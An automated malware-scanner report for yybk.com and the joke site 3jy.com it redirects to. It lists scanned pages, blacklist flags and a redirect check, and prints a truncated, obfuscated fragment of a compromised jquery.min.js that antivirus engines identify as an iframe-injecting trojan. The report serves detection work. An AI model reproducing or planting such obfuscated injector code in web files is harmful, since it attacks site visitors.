New scan:

Malware Scanner report for yybk.com

Malicious/Suspicious/Total urls checked
1/11/18
12 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "yybk.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=yybk.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://yybk.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 16:48:07 GMT
Location: http://www.3jy.com/
Server: nginx
Content-Type: text/html
clean
http://www.3jy.com/
200 OK
Content-Length: 60124
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>【笑话】内涵笑话大全图片_幽默笑话大全爆笑_爆笑笑话大全网-叽歪笑话</title>
<meta name="keywords" content="笑话,爆
...[4237 bytes skipped]...

http://www.3jy.com/pd/pos.js?20140930
200 OK
Content-Length: 9955
Content-Type: application/javascript
suspicious
Page code contains blacklisted domain: api.3jy.com

...[3238 bytes skipped]...
script type=\"text/javascript\">/*625*75,3jy_全站通显左3*/var cpro_id = \"u1350300\";</script><script src=\"http://cpro.baidustatic.com/cpro/ui/c.js\"type=\"text/javascript\"></script>'; document.write(adstring); } } };var jiwai_config = {statics_image:"http://img.3jy.com/statics/images/",statics_js:"http://www.3jy.com/statics/js/",statics_css:"http://www.3jy.com/statics/css/",siteurl:"http://www.3jy.com/",apiurl:"api.3jy.com",baseurl:"3jy.com",imageuurl:"http://u.3jy.com/",imageurl:"http://img.3jy.com/",readurl :"http://www.3jy.com/",ajaxurl :"http://api.3jy.com/index.php",writeurl :"http://my.3jy.com/index.php",uurl:"http://u.3jy.com/"};function GetQueryString(name){var reg=new RegExp("(^|&)"+name+"=([^&]*)(&|$)");var r=window.location.search.substr(1).match(reg);if(r!=null)return unescape(r[2]);return null}var ref=document.referrer,MUSER = GetQueryString("f");var is360=(ref.indexOf('3600.c
...[65 bytes skipped]...

http://www.3jy.com/statics/js/jquery.min.js?20140930
200 OK
Content-Length: 74794
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.cal
... 3174 bytes are skipped ...
m$[6]){A.Q( m$[7])}W B(x.J== m$[8]&&x.K.L(/8./i)== m$[9]){A.Q( m$[10])}W B(x.J== m$[11]&&x.K.L(/9./i)== m$[12]){A.Q( m$[13])}}',62,80,'||||||||||x73|x74|x65|x72|x70|x2f|x63|x6f||x6e|x69|x2e|_|x61|x20|x6c|x62|x68|x6d|x3e|x3d|x5f|x79|navigator|x22|x3c|document|if|x38|x78|x77|x6a|x4d|x66|x49|appName|appVersion|match|x45|x7a|x75|x64|write|O43f48|x3a|x37|x39|x36|else|x35|x32|x3b|||||x31|x30|cookie|0x3c|0x1|var|x59|toGMTString|0x3e8|new|indexOf|Date|getTime|setTime'.split('|'),0,{}))

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Iframer
Sophos
Mal/Iframe-Gen

http://www.3jy.com/statics/js/l2.js?20140930
200 OK
Content-Length: 52087
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: admin.3jy.com

...[690 bytes skipped]...
"){
is_moz = userAgent.substr(userAgent.indexOf("firefox") + 8, 3);
}
//判断浏览器是否为ie浏览器
if(userAgent.indexOf("msie") != -1&&!is_opera){
is_ie = userAgent.substr(userAgent.indexOf("msie") + 5, 3)
}
//判断浏览器是否为苹果浏览器
is_safar = -1 != userAgent.indexOf("webkit") || -1 != userAgent.indexOf("safari");
//设定当前域
if(window.location.href.indexOf('admin.3jy.com')<=-1){
document.domain = jiwai_config.baseurl;
}
//站点js方法
var jiwai = {
//-------------公共变量----------------------

hotcom: [],TryErr: 0,IsList: 0,IsEmpty: 0,JokeID: 0,listcheck: 0,atlaspage: 0,atlasurl: "",object:"",

//-------------公共方法----------------------

//id对象选择器
$: function(a) {
var b = document.getElementById(a);
if (b) {
return b
} else {
return
...[2969 bytes skipped]...

http://s4.cnzz.com/stat.php?id=5488099&web_id=5488099
200 OK
Content-Length: 10071
Content-Type: application/javascript
clean
http://www.3jy.com/statics/js/tongji_cid.js
200 OK
Content-Length: 8757
Content-Type: application/javascript
clean
http://yybk.com/zuixin
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 16:48:16 GMT
Location: http://www.3jy.com/zuixin
Server: nginx
Content-Type: text/html
clean
http://www.3jy.com/zuixin
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Connection: close
Date: Mon, 12 Jan 2015 16:48:17 GMT
Location: http://www.3jy.com/zuixin/
Server: nginx
Content-Type: text/html
Expires: Mon, 12 Jan 2015 17:03:17 GMT
clean
http://www.3jy.com/zuixin/
200 OK
Content-Length: 51258
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>最新_叽歪笑话</title>
<meta name="keywords" content="笑话,搞笑图片,冷笑话,搞笑,内涵图,幽默笑话,叽歪网"/>
<met
...[4466 bytes skipped]...

http://www.3jy.com/youmo/
200 OK
Content-Length: 51984
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>【幽默笑话大全】幽默笑话大全|爆笑幽默笑话短信|故事-叽歪笑话</title>
<meta name="keywords" content="幽默笑话大全ç
...[4442 bytes skipped]...

http://www.3jy.com/egao/
200 OK
Content-Length: 48352
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>【搞笑图片】搞笑图片大全_搞笑图片笑死人-叽歪笑话</title>
<meta name="keywords" content="搞笑图片,搞笑图片笑死人,
...[4466 bytes skipped]...

http://www.3jy.com/neihantu/
200 OK
Content-Length: 50709
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>【内涵图片】搞笑内涵图片_十张内涵图片_邪恶内涵图片-叽歪笑话</title>
<meta name="keywords" content="内涵图,内涵图
...[4442 bytes skipped]...

http://www.3jy.com/dongtu/
200 OK
Content-Length: 53573
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>【动态图片】搞笑动态图片大全_邪恶动态图片大全-叽歪笑话</title>
<meta name="keywords" content="搞笑动态图片,邪恶å
...[4445 bytes skipped]...

http://www.3jy.com/gaoxiaoshipin/
200 OK
Content-Length: 47831
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>【搞笑视频】cf搞笑视频_搞笑视频笑死人不偿命-叽歪笑话</title>
<meta name="keywords" content="搞笑视频,cf搞笑视频,æ
...[4441 bytes skipped]...

http://s22.cnzz.com/stat.php?id=5536712&web_id=5536712
200 OK
Content-Length: 10072
Content-Type: application/javascript
clean
http://www.3jy.com/tag/56/
200 OK
Content-Length: 50891
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>【今日精选】今日精选什么意思_什么叫今日精选-叽歪笑话</title>
<meta name="keywords" content="今日精选,今日精选什ä
...[4458 bytes skipped]...

http://www.3jy.com/tag/8/
200 OK
Content-Length: 57005
Content-Type: text/html
suspicious
Page code contains blacklisted domain: my.3jy.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>【内涵笑话吧】内涵笑话大全_猫扑内涵笑话-叽歪笑话</title>
<meta name="keywords" content="内涵笑话吧,内涵笑话大全,
...[4470 bytes skipped]...


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: yybk.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 16:48:07 GMT
Location: http://www.3jy.com/
Server: nginx
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: yybk.com
Referer: http://www.google.com/search?q=yybk.com

Result:
The result is similar to the first query. There are no suspicious redirects found.